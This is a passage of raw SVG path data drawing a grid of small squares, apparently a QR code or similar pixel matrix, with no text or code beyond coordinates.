45.0 L 30.6 45.0 L 30.6 43.2 z M 10.8 61.2 L 10.8 63.0 L 12.6 63.0 L 12.6 61.2 z M 54 12.6 L 54 14.4 L 55.8 14.4 L 55.8 12.6 z M 59.4 46.8 L 59.4 48.6 L 61.2 48.6 L 61.2 46.8 z M 14.4 50.4 L 14.4 52.2 L 16.2 52.2 L 16.2 50.4 z M 63 7.2 L 63 9.0 L 64.8 9.0 L 64.8 7.2 z M 55.8 64.8 L 55.8 66.6 L 57.6 66.6 L 57.6 64.8 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 45 54 L 45 55.8 L 46.8 55.8 L 46.8 54 z M 37.8 25.2 L 37.8 27.0 L 39.6 27.0 L 39.6 25.2 z M 43.2 9 L 43.2 10.8 L 45.0 10.8 L 45.0 9 z M 39.6 37.8 L 39.6 39.6 L 41.4 39.6 L 41.4 37.8 z M 21.6 19.8 L 21.6 21.6 L 23.4 21.6 L 23.4 19.8 z M 64.8 14.4 L 64.8 16.2 L 66.6 16.2 L 66.6 14.4 z M 27 21.6 L 27 23.4 L 28.8 23.4 L 28.8 21.6 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 50.4 36 L 50.4 37.8 L 52.2 37.8 L 52.2 36 z M 32.4 19.8 L 32.4 21.6 L 34.2 21.6 L 34.2 19.8 z M 52.2 30.6 L 52.2 32.4 L 54.0 32.4 L 54.0 30.6 z M 30.6 39.6 L 30.6 41.4 L 32.4 41.4 L 32.4 39.6 z M 54 25.2 L 54 27.0 L 55.8 27.0 L 55.8 25.2 z M 7.2 23.4 L 7.2 25.2 L 9.0 25.2 L 9.0 23.4 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 57.6 14.4 L 57.6 16.2 L 59.4 16.2 L 59.4 14.4 z M 63 23.4 L 63 25.2 L 64.8 25.2 L 64.8 23.4 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 59.4 23.4 L 59.4 25.2 L 61.2 25.2 L 61.2 23.4 z M 61.2 46.8 L 61.2 48.6 L 63.0 48.6 L 63.0 46.8 z M 41.4 34.2 L 41.4 36.0 L 43.2 36.0 L 43.2 34.2 z M 37.8 12.6 L 37.8 14.4 L 39.6 14.4 L 39.6 12.6 z M 16.2 64.8 L 16.2 66.6 L 18.0 66.6 L 18.0 64.8 z M 39.6 21.6 L 39.6 23.4 L 41.4 23.4 L 41.4 21.6 z M 36 50.4 L 36 52.2 L 37.8 52.2 L 37.8 50.4 z M 45 30.6 L 45 32.4 L 46.8 32.4 L 46.8 30.6 z M 21.6 32.4 L 21.6 34.2 L 23.4 34.2 L 23.4 32.4 z M 64.8 55.8 L 64.8 57.6 L 66.6 57.6 L 66.6 55.8 z M 46.8 10.8 L 46.8 12.6 L 48.6 12.6 L 48.6 10.8 z M 23.4 34.2 L 23.4 36.0 L 25.2 36.0 L 25.2 34.2 z M 48.6 27 L 48.6 28.8 L 50.4 28.8 L 50.4 27 z M 21.6 43.2 L 21.6 45.0 L 23.4 45.0 L 23.4 43.2 z M 27 9 L 27 10.8 L 28.8 10.8 L 28.8 9 z M 25.2 46.8 L 25.2 48.6 L 27.0 48.6 L 27.0 46.8 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 54 45 L 54 46.8 L 55.8 46.8 L 55.8 45 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 55.8 50.4 L 55.8 52.2 L 57.6 52.2 L 57.6 50.4 z M 57.6 12.6 L 57.6 14.4 L 59.4 14.4 L 59.4 12.6 z M 10.8 25.2 L 10.8 27.0 L 12.6 27.0 L 12.6 25.2 z M 16.2 34.2 L 16.2 36.0 L 18.0 36.0 L 18.0 34.2 z M 59.4 10.8 L 59.4 12.6 L 61.2 12.6 L 61.2 10.8 z M 12.6 41.4 L 12.6 43.2 L 14.4 43.2 L 14.4 41.4 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 45 46.8 L 45 48.6 L 46.8 48.6 L 46.8 46.8 z M 64.8 21.6 L 64.8 23.4 L 66.6 23.4 L 66.6 21.6 z M 23.4 54 L 23.4 55.8 L 25.2 55.8 L 25.2 54 z M 50.4 61.2 L 50.4 63.0 L 52.2 63.0 L 52.2 61.2 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 52.2 63 L 52.2 64.8 L 54.0 64.8 L 54.0 63 z M 34.2 43.2 L 34.2 45.0 L 36.0 45.0 L 36.0 43.2 z M 30.6 14.4 L 30.6 16.2 L 32.4 16.2 L 32.4 14.4 z M 54 57.6 L 54 59.4 L 55.8 59.4 L 55.8 57.6 z M 50.4 14.4 L 50.4 16.2 L 52.2 16.2 L 52.2 14.4 z M 55.8 37.8 L 55.8 39.6 L 57.6 39.6 L 57.6 37.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 57.6 54 L 57.6 55.8 L 59.4 55.8 L 59.4 54 z M 54 18 L 54 19.8 L 55.8 19.8 L 55.8 18 z M 12.6 50.4 L 12.6 52.2 L 14.4 52.2 L 14.4 50.4 z M 61.2 7.2 L 61.2 9.0 L 63.0 9.0 L 63.0 7.2 z M 14.4 41.4 L 14.4 43.2 L 16.2 43.2 L 16.2 41.4 z M 41.4 59.4 L 41.4 61.2 L 43.2 61.2 L 43.2 59.4 z M 41.4 12.6 L 41.4 14.4 L 43.2 14.4 L 43.2 12.6 z M 37.8 48.6 L 37.8 50.4 L 39.6 50.4 L 39.6 48.6 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 23.4 12.6 L 23.4 14.4 L 25.2 14.4 L 25.2 12.6 z M 7.2 61.2 L 7.2 63.0 L 9.0 63.0 L 9.0 61.2 z M 55.8 46.8 L 55.8 48.6 L 57.6 48.6 L 57.6 46.8 z M 52.2 25.2 L 52.2 27.0 L 54.0 27.0 L 54.0 25.2 z M 30.6 48.6 L 30.6 50.4 L 32.4 50.4 L 32.4 48.6 z M 10.8 57.6 L 10.8 59.4 L 12.6 59.4 L 12.6 57.6 z M 54 9 L 54 10.8 L 55.8 10.8 L 55.8 9 z M 55.8 28.8 L 55.8 30.6 L 57.6 30.6 L 57.6 28.8 z M 14.4 54 L 14.4 55.8 L 16.2 55.8 L 16.2 54 z M 57.6 34.2 L 57.6 36.0 L 59.4 36.0 L 59.4 34.2 z M 36 30.6 L 36 32.4 L 37.8 32.4 L 37.8 30.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 14.4 64.8 L 14.4 66.6 L 16.2 66.6 L 16.2 64.8 z M 41.4 21.6 L 41.4 23.4 L 43.2 23.4 L 43.2 21.6 z M 64.8 64.8 L 64.8 66.6 L 66.6 66.6 L 66.6 64.8 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 48.6 46.8 L 48.6 48.6 L 50.4 48.6 L 50.4 46.8 z M 21.6 23.4 L 21.6 25.2 L 23.4 25.2 L 23.4 23.4 z M 64.8 18 L 64.8 19.8 L 66.6 19.8 L 66.6 18 z M 46.8 23.4 L 46.8 25.2 L 48.6 25.2 L 48.6 23.4 z M 34.2 54 L 34.2 55.8 L 36.0 55.8 L 36.0 54 z M 27 25.2 L 27 27.0 L 28.8 27.0 L 28.8 25.2 z M 7.2 45 L 7.2 46.8 L 9.0 46.8 L 9.0 45 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 28.8 30.6 L 28.8 32.4 L 30.6 32.4 L 30.6 30.6 z M 9 36 L 9 37.8 L 10.8 37.8 L 10.8 36 z M 52.2 41.4 L 52.2 43.2 L 54.0 43.2 L 54.0 41.4 z M 10.8 48.6 L 10.8 50.4 L 12.6 50.4 L 12.6 48.6 z M 54 21.6 L 54 23.4 L 55.8 23.4 L 55.8 21.6 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 57.6 18 L 57.6 19.8 L 59.4 19.8 L 59.4 18 z M 41.4 37.8 L 41.4 39.6 L 43.2 39.6 L 43.2 37.8 z M 37.8 9 L 37.8 10.8 L 39.6 10.8 L 39.6 9 z M 19.8 39.6 L 19.8 41.4 L 21.6 41.4 L 21.6 39.6 z M 43.2 25.2 L 43.2 27.0 L 45.0 27.0 L 45.0 25.2 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 45 27 L 45 28.8 L 46.8 28.8 L 46.8 27 z M 25.2 64.8 L 25.2 66.6 L 27.0 66.6 L 27.0 64.8 z M 37.8 55.8 L 37.8 57.6 L 39.6 57.6 L 39.6 55.8 z M 64.8 59.4 L 64.8 61.2 L 66.6 61.2 L 66.6 59.4 z M 23.4 30.6 L 23.4 32.4 L 25.2 32.4 L 25.2 30.6 z M 25.2 25.2 L 25.2 27.0 L 27.0 27.0 L 27.0 25.2 z M 27 12.6 L 27 14.4 L 28.8 14.4 L 28.8 12.6 z M 50.4 52.2 L 50.4 54.0 L 52.2 54.0 L 52.2 52.2 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 52.2 43.2 L 52.2 45.0 L 54.0 45.0 L 54.0 43.2 z M 30.6 23.4 L 30.6 25.2 L 32.4 25.2 L 32.4 23.4 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 12.6 34.2 L 12.6 36.0 L 14.4 36.0 L 14.4 34.2 z M 14.4 21.6 L 14.4 23.4 L 16.2 23.4 L 16.2 21.6 z M 57.6 59.4 L 57.6 61.2 L 59.4 61.2 L 59.4 59.4 z M 59.4 7.2 L 59.4 9.0 L 61.2 9.0 L 61.2 7.2 z M 12.6 45 L 12.6 46.8 L 14.4 46.8 L 14.4 45 z M 52.2 64.8 L 52.2 66.6 L 54.0 66.6 L 54.0 64.8 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 14.4 46.8 L 14.4 48.6 L 16.2 48.6 L 16.2 46.8 z M 16.2 48.6 L 16.2 50.4 L 18.0 50.4 L 18.0 48.6 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 64.8 43.2 L 64.8 45.0 L 66.6 45.0 L 66.6 43.2 z M 39.6 55.8 L 39.6 57.6 L 41.4 57.6 L 41.4 55.8 z M 64.8 25.2 L 64.8 27.0 L 66.6 27.0 L 66.6 25.2 z M 28.8 12.6 L 28.8 14.4 L 30.6 14.4 L 30.6 12.6 z M 34.2 46.8 L 34.2 48.6 L 36.0 48.6 L 36.0 46.8 z M 30.6 10.8 L 30.6 12.6 L 32.4 12.6 L 32.4 10.8 z M 27 61.2 L 27 63.0 L 28.8 63.0 L 28.8 61.2 z M 54 54 L 54 55.8 L 55.8 55.8 L 55.8 54 z M 50.4 18 L 50.4 19.8 L 52.2 19.8 L 52.2 18 z M 28.8 52.2 L 28.8 54.0 L 30.6 54.0 L 30.6 52.2 z M 55.8 41.4 L 55.8 43.2 L 57.6 43.2 L 57.6 41.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 54 14.4 L 54 16.2 L 55.8 16.2 L 55.8 14.4 z M 59.4 52.2 L 59.4 54.0 L 61.2 54.0 L 61.2 52.2 z M 12.6 54 L 12.6 55.8 L 14.4 55.8 L 14.4 54 z M 55.8 23.4 L 55.8 25.2 L 57.6 25.2 L 57.6 23.4 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 61.2 18 L 61.2 19.8 L 63.0 19.8 L 63.0 18 z M 14.4 59.4 L 14.4 61.2 L 16.2 61.2 L 16.2 59.4 z M 41.4 63 L 41.4 64.8 L 43.2 64.8 L 43.2 63 z M 12.6 64.8 L 12.6 66.6 L 14.4 66.6 L 14.4 64.8 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 18 63 L 18 64.8 L 19.8 64.8 L 19.8 63 z M 45 59.4 L 45 61.2 L 46.8 61.2 L 46.8 59.4 z M 41.4 16.2 L 41.4 18.0 L 43.2 18.0 L 43.2 16.2 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 45 19.8 L 45 21.6 L 46.8 21.6 L 46.8 19.8 z M 21.6 14.4 L 21.6 16.2 L 23.4 16.2 L 23.4 14.4 z M 64.8 9 L 64.8 10.8 L 66.6 10.8 L 66.6 9 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 52.2 21.6 L 52.2 23.4 L 54.0 23.4 L 54.0 21.6 z M 57.6 41.4 L 57.6 43.2 L 59.4 43.2 L 59.4 41.4 z M 10.8 54 L 10.8 55.8 L 12.6 55.8 L 12.6 54 z M 54 34.2 L 54 36.0 L 55.8 36.0 L 55.8 34.2 z M 59.4 39.6 L 59.4 41.4 L 61.2 41.4 L 61.2 39.6 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 61.2 23.4 L 61.2 25.2 L 63.0 25.2 L 63.0 23.4 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 18 46.8 L 18 48.6 L 19.8 48.6 L 19.8 46.8 z M 23.4 64.8 L 23.4 66.6 L 25.2 66.6 L 25.2 64.8 z M 48.6 36 L 48.6 37.8 L 50.4 37.8 L 50.4 36 z M 45 7.2 L 45 9.0 L 46.8 9.0 L 46.8 7.2 z M 21.6 27 L 21.6 28.8 L 23.4 28.8 L 23.4 27 z M 46.8 34.2 L 46.8 36.0 L 48.6 36.0 L 48.6 34.2 z M 23.4 25.2 L 23.4 27.0 L 25.2 27.0 L 25.2 25.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 32.4 27 L 32.4 28.8 L 34.2 28.8 L 34.2 27 z M 28.8 34.2 L 28.8 36.0 L 30.6 36.0 L 30.6 34.2 z M 30.6 32.4 L 30.6 34.2 L 32.4 34.2 L 32.4 32.4 z M 7.2 30.6 L 7.2 32.4 L 9.0 32.4 L 9.0 30.6 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 57.6 7.2 L 57.6 9.0 L 59.4 9.0 L 59.4 7.2 z M 10.8 34.2 L 10.8 36.0 L 12.6 36.0 L 12.6 34.2 z M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 41.4 41.4 L 41.4 43.2 L 43.2 43.2 L 43.2 41.4 z M 37.8 19.8 L 37.8 21.6 L 39.6 21.6 L 39.6 19.8 z M 63 41.4 L 63 43.2 L 64.8 43.2 L 64.8 41.4 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 46.8 18 L 46.8 19.8 L 48.6 19.8 L 48.6 18 z M 39.6 61.2 L 39.6 63.0 L 41.4 63.0 L 41.4 61.2 z M 48.6 19.8 L 48.6 21.6 L 50.4 21.6 L 50.4 19.8 z M 27 16.2 L 27 18.0 L 28.8 18.0 L 28.8 16.2 z M 23.4 45 L 23.4 46.8 L 25.2 46.8 L 25.2 45 z M 50.4 55.8 L 50.4 57.6 L 52.2 57.6 L 52.2 55.8 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 34.2 27 L 34.2 28.8 L 36.0 28.8 L 36.0 27 z M 27 55.8 L 27 57.6 L 28.8 57.6 L 28.8 55.8 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 50.4 9 L 50.4 10.8 L 52.2 10.8 L 52.2 9 z M 55.8 57.6 L 55.8 59.4 L 57.6 59.4 L 57.6 57.6 z M 14.4 25.2 L 14.4 27.0 L 16.2 27.0 L 16.2 25.2 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 61.2 59.4 L 61.2 61.2 L 63.0 61.2 L 63.0 59.4 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 41.4 50.4 L 41.4 52.2 L 43.2 52.2 L 43.2 50.4 z M 10.8 64.8 L 10.8 66.6 L 12.6 66.6 L 12.6 64.8 z M 43.2 41.4 L 43.2 43.2 L 45.0 43.2 L 45.0 41.4 z M 18 54 L 18 55.8 L 19.8 55.8 L 19.8 54 z M 46.8 52.2 L 46.8 54.0 L 48.6 54.0 L 48.6 52.2 z M 23.4 61.2 L 23.4 63.0 L 25.2 63.0 L 25.2 61.2 z M 32.4 45 L 32.4 46.8 L 34.2 46.8 L 34.2 45 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 54 50.4 L 54 52.2 L 55.8 52.2 L 55.8 50.4 z M 7.2 55.8 L 7.2 57.6 L 9.0 57.6 L 9.0 55.8 z M 50.4 21.6 L 50.4 23.4 L 52.2 23.4 L 52.2 21.6 z M 55.8 45 L 55.8 46.8 L 57.6 46.8 L 57.6 45 z M 9 54 L 9 55.8 L 10.8 55.8 L 10.8 54 z M 54 10.8 L 54 12.6 L 55.8 12.6 L 55.8 10.8 z M 12.6 57.6 L 12.6 59.4 L 14.4 59.4 L 14.4 57.6 z M 61.2 14.4 L 61.2 16.2 L 63.0 16.2 L 63.0 14.4 z M 43.2 54 L 43.2 55.8 L 45.0 55.8 L 45.0 54 z M 18 59.4 L 18 61.2 L 19.8 61.2 L 19.8 59.4 z M 45 55.8 L 45 57.6 L 46.8 57.6 L 46.8 55.8 z M 37.8 27 L 37.8 28.8 L 39.6 28.8 L 39.6 27 z M 19.8 50.4 L 19.8 52.2 L 21.6 52.2 L 21.6 50.4 z M 46.8 36 L 46.8 37.8 L 48.6 37.8 L 48.6 36 z M 21.6 64.8 L 21.6 66.6 L 23.4 66.6 L 23.4 64.8 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 64.8 12.6 L 64.8 14.4 L 66.6 14.4 L 66.6 12.6 z M 46.8 25.2 L 46.8 27.0 L 48.6 27.0 L 48.6 25.2 z M 27 23.4 L 27 25.2 L 28.8 25.2 L 28.8 23.4 z M 50.4 34.2 L 50.4 36.0 L 52.2 36.0 L 52.2 34.2 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 52.2 32.4 L 52.2 34.2 L 54.0 34.2 L 54.0 32.4 z M 34.2 19.8 L 34.2 21.6 L 36.0 21.6 L 36.0 19.8 z M 30.6 41.4 L 30.6 43.2 L 32.4 43.2 L 32.4 41.4 z M 54 30.6 L 54 32.4 L 55.8 32.4 L 55.8 30.6 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 59.4 36 L 59.4 37.8 L 61.2 37.8 L 61.2 36 z M 55.8 7.2 L 55.8 9.0 L 57.6 9.0 L 57.6 7.2 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 57.6 27 L 57.6 28.8 L 59.4 28.8 L 59.4 27 z M 63 32.4 L 63 34.2 L 64.8 34.2 L 64.8 32.4 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 41.4 28.8 L 41.4 30.6 L 43.2 30.6 L 43.2 28.8 z M 19.8 37.8 L 19.8 39.6 L 21.6 39.6 L 21.6 37.8 z M 63 43.2 L 63 45.0 L 64.8 45.0 L 64.8 43.2 z M 43.2 34.2 L 43.2 36.0 L 45.0 36.0 L 45.0 34.2 z M 39.6 27 L 39.6 28.8 L 41.4 28.8 L 41.4 27 z M 48.6 39.6 L 48.6 41.4 L 50.4 41.4 L 50.4 39.6 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 64.8 54 L 64.8 55.8 L 66.6 55.8 L 66.6 54 z M 46.8 30.6 L 46.8 32.4 L 48.6 32.4 L 48.6 30.6 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 21.6 41.4 L 21.6 43.2 L 23.4 43.2 L 23.4 41.4 z M 27 32.4 L 27 34.2 L 28.8 34.2 L 28.8 32.4 z M 23.4 39.6 L 23.4 41.4 L 25.2 41.4 L 25.2 39.6 z M 50.4 46.8 L 50.4 48.6 L 52.2 48.6 L 52.2 46.8 z M 28.8 23.4 L 28.8 25.2 L 30.6 25.2 L 30.6 23.4 z M 9 43.2 L 9 45.0 L 10.8 45.0 L 10.8 43.2 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 10.8 41.4 L 10.8 43.2 L 12.6 43.2 L 12.6 41.4 z M 54 43.2 L 54 45.0 L 55.8 45.0 L 55.8 43.2 z M 12.6 25.2 L 12.6 27.0 L 14.4 27.0 L 14.4 25.2 z M 57.6 10.8 L 57.6 12.6 L 59.4 12.6 L 59.4 10.8 z M 10.8 30.6 L 10.8 32.4 L 12.6 32.4 L 12.6 30.6 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 59.4 12.6 L 59.4 14.4 L 61.2 14.4 L 61.2 12.6 z M 12.6 36 L 12.6 37.8 L 14.4 37.8 L 14.4 36 z M 9 64.8 L 9 66.6 L 10.8 66.6 L 10.8 64.8 z M 61.2 50.4 L 61.2 52.2 L 63.0 52.2 L 63.0 50.4 z M 41.4 45 L 41.4 46.8 L 43.2 46.8 L 43.2 45 z M 19.8 32.4 L 19.8 34.2 L 21.6 34.2 L 21.6 32.4 z M 63 59.4 L 63 61.2 L 64.8 61.2 L 64.8 59.4 z M 43.2 46.8 L 43.2 48.6 L 45.0 48.6 L 45.0 46.8 z M 36 61.2 L 36 63.0 L 37.8 63.0 L 37.8 61.2 z M 45 48.6 L 45 50.4 L 46.8 50.4 L 46.8 48.6 z M 64.8 37.8 L 64.8 39.6 L 66.6 39.6 L 66.6 37.8 z M 39.6 57.6 L 39.6 59.4 L 41.4 59.4 L 41.4 57.6 z M 48.6 9 L 48.6 10.8 L 50.4 10.8 L 50.4 9 z M 21.6 54 L 21.6 55.8 L 23.4 55.8 L 23.4 54 z M 50.4 59.4 L 50.4 61.2 L 52.2 61.2 L 52.2 59.4 z M 32.4 36 L 32.4 37.8 L 34.2 37.8 L 34.2 36 z M 28.8 7.2 L 28.8 9.0 L 30.6 9.0 L 30.6 7.2 z M 52.2 50.4 L 52.2 52.2 L 54.0 52.2 L 54.0 50.4 z M 30.6 16.2 L 30.6 18.0 L 32.4 18.0 L 32.4 16.2 z M 27 59.4 L 27 61.2 L 28.8 61.2 L 28.8 59.4 z M 54 63 L 54 64.8 L 55.8 64.8 L 55.8 63 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 50.4 12.6 L 50.4 14.4 L 52.2 14.4 L 52.2 12.6 z M 28.8 61.2 L 28.8 63.0 L 30.6 63.0 L 30.6 61.2 z M 55.8 61.2 L 55.8 63.0 L 57.6 63.0 L 57.6 61.2 z M 30.6 63 L 30.6 64.8 L 32.4 64.8 L 32.4 63 z M 57.6 52.2 L 57.6 54.0 L 59.4 54.0 L 59.4 52.2 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 61.2 12.6 L 61.2 14.4 L 63.0 14.4 L 63.0 12.6 z M 63 54 L 63 55.8 L 64.8 55.8 L 64.8 54 z M 16.2 41.4 L 16.2 43.2 L 18.0 43.2 L 18.0 41.4 z M 48.6 64.8 L 48.6 66.6 L 50.4 66.6 L 50.4 64.8 z M 18 50.4 L 18 52.2 L 19.8 52.2 L 19.8 50.4 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 46.8 63 L 46.8 64.8 L 48.6 64.8 L 48.6 63 z M 39.6 48.6 L 39.6 50.4 L 41.4 50.4 L 41.4 48.6 z M 32.4 55.8 L 32.4 57.6 L 34.2 57.6 L 34.2 55.8 z M 25.2 55.8 L 25.2 57.6 L 27.0 57.6 L 27.0 55.8 z M 7.2 59.4 L 7.2 61.2 L 9.0 61.2 L 9.0 59.4 z M 50.4 25.2 L 50.4 27.0 L 52.2 27.0 L 52.2 25.2 z M 28.8 45 L 28.8 46.8 L 30.6 46.8 L 30.6 45 z M 9 50.4 L 9 52.2 L 10.8 52.2 L 10.8 50.4 z M 30.6 50.4 L 30.6 52.2 L 32.4 52.2 L 32.4 50.4 z M 54 7.2 L 54 9.0 L 55.8 9.0 L 55.8 7.2 z M 59.4 45 L 59.4 46.8 L 61.2 46.8 L 61.2 45 z M 12.6 61.2 L 12.6 63.0 L 14.4 63.0 L 14.4 61.2 z M 57.6 32.4 L 57.6 34.2 L 59.4 34.2 L 59.4 32.4 z M 59.4 34.2 L 59.4 36.0 L 61.2 36.0 L 61.2 34.2 z M 41.4 23.4 L 41.4 25.2 L 43.2 25.2 L 43.2 23.4 z M 46.8 46.8 L 46.8 48.6 L 48.6 48.6 L 48.6 46.8 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 48.6 48.6 L 48.6 50.4 L 50.4 50.4 L 50.4 48.6 z M 45 12.6 L 45 14.4 L 46.8 14.4 L 46.8 12.6 z M 21.6 21.6 L 21.6 23.4 L 23.4 23.4 L 23.4 21.6 z M 64.8 16.2 L 64.8 18.0 L 66.6 18.0 L 66.6 16.2 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z M 25.2 10.8 L 25.2 12.6 L 27.0 12.6 L 27.0 10.8 z M 34.2 55.8 L 34.2 57.6 L 36.0 57.6 L 36.0 55.8 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 50.4 37.8 L 50.4 39.6 L 52.2 39.6 L 52.2 37.8 z M 32.4 14.4 L 32.4 16.2 L 34.2 16.2 L 34.2 14.4 z M 34.2 9 L 34.2 10.8 L 36.0 10.8 L 36.0 9 z M 10.8 46.8 L 10.8 48.6 L 12.6 48.6 L 12.6 46.8 z M 54 27 L 54 28.8 L 55.8 28.8 L 55.8 27 z M 61.2 30.6 L 61.2 32.4 L 63.0 32.4 L 63.0 30.6 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 7.2 64.8 L 7.2 66.6 L 9.0 66.6 L 9.0 64.8 z M 59.4 21.6 L 59.4 23.4 L 61.2 23.4 L 61.2 21.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 61.2 48.6 L 61.2 50.4 L 63.0 50.4 L 63.0 48.6 z M 41.4 32.4 L 41.4 34.2 L 43.2 34.2 L 43.2 32.4 z M 63 46.8 L 63 48.6 L 64.8 48.6 L 64.8 46.8 z M 43.2 23.4 L 43.2 25.2 L 45.0 25.2 L 45.0 23.4 z M 21.6 34.2 L 21.6 36.0 L 23.4 36.0 L 23.4 34.2 z M 23.4 32.4 L 23.4 34.2 L 25.2 34.2 L 25.2 32.4 z M 48.6 25.2 L 48.6 27.0 L 50.4 27.0 L 50.4 25.2 z M 25.2 30.6 L 25.2 32.4 L 27.0 32.4 L 27.0 30.6 z M 27 7.2 L 27 9.0 L 28.8 9.0 L 28.8 7.2 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 50.4 50.4 L 50.4 52.2 L 52.2 52.2 L 52.2 50.4 z M 32.4 34.2 L 32.4 36.0 L 34.2 36.0 L 34.2 34.2 z M 25.2 48.6 L 25.2 50.4 L 27.0 50.4 L 27.0 48.6 z M 10.8 37.8 L 10.8 39.6 L 12.6 39.6 L 12.6 37.8 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 12.6 28.8 L 12.6 30.6 L 14.4 30.6 L 14.4 28.8 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 57.6 57.6 L 57.6 59.4 L 59.4 59.4 L 59.4 57.6 z M 10.8 27 L 10.8 28.8 L 12.6 28.8 L 12.6 27 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 14.4 45 L 14.4 46.8 L 16.2 46.8 L 16.2 45 z M 19.8 21.6 L 19.8 23.4 L 21.6 23.4 L 21.6 21.6 z M 46.8 64.8 L 46.8 66.6 L 48.6 66.6 L 48.6 64.8 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 61.2 64.8 L 61.2 66.6 L 63.0 66.6 L 63.0 64.8 z M 37.8 59.4 L 37.8 61.2 L 39.6 61.2 L 39.6 59.4 z M 46.8 54 L 46.8 55.8 L 48.6 55.8 L 48.6 54 z M 21.6 57.6 L 21.6 59.4 L 23.4 59.4 L 23.4 57.6 z M 64.8 23.4 L 64.8 25.2 L 66.6 25.2 L 66.6 23.4 z M 28.8 10.8 L 28.8 12.6 L 30.6 12.6 L 30.6 10.8 z M 25.2 61.2 L 25.2 63.0 L 27.0 63.0 L 27.0 61.2 z M 34.2 48.6 L 34.2 50.4 L 36.0 50.4 L 36.0 48.6 z M 54 59.4 L 54 61.2 L 55.8 61.2 L 55.8 59.4 z M 7.2 50.4 L 7.2 52.2 L 9.0 52.2 L 9.0 50.4 z M 